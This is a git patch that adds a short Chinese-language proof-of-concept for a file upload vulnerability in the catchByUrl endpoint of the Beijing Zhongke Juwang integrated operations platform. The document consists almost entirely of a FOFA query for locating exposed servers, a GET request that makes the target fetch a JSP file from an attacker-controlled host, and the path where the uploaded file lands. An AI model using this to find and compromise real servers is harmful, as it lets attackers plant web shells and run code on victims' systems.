From 16c580f5452be34cbcabecd169c7d72f43d583cc Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 1 May 2024 13:33:01 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=8C=97=E4=BA=AC=E4=B8=AD=E7=A7=91?=
 =?UTF-8?q?=E8=81=9A=E7=BD=91=E4=B8=80=E4=BD=93=E5=8C=96=E8=BF=90=E8=90=A5?=
 =?UTF-8?q?=E5=B9=B3=E5=8F=B0catchByUrl=E5=AD=98=E5=9C=A8=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��网一体化运营平台catchByUrl存在文件上传漏洞.md | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md

diff --git a/北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md b/北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md
new file mode 100644
index 0000000..b455ced
--- /dev/null
+++ b/北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md
@@ -0,0 +1,21 @@
+## 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞
+
+## fofa
+```
+body="thirdparty/ueditor/WordPaster"
+```
+
+## poc
+```
+GET /resources/files/ue/catchByUrl?url=http://vpsip/exp.jsp HTTP/1.1 
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+Connection: close
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/3e2d95ec-d3e1-44a9-aed6-17152ed0a3aa)
+
+文件路径`http://ip/files/headimg/.jsp`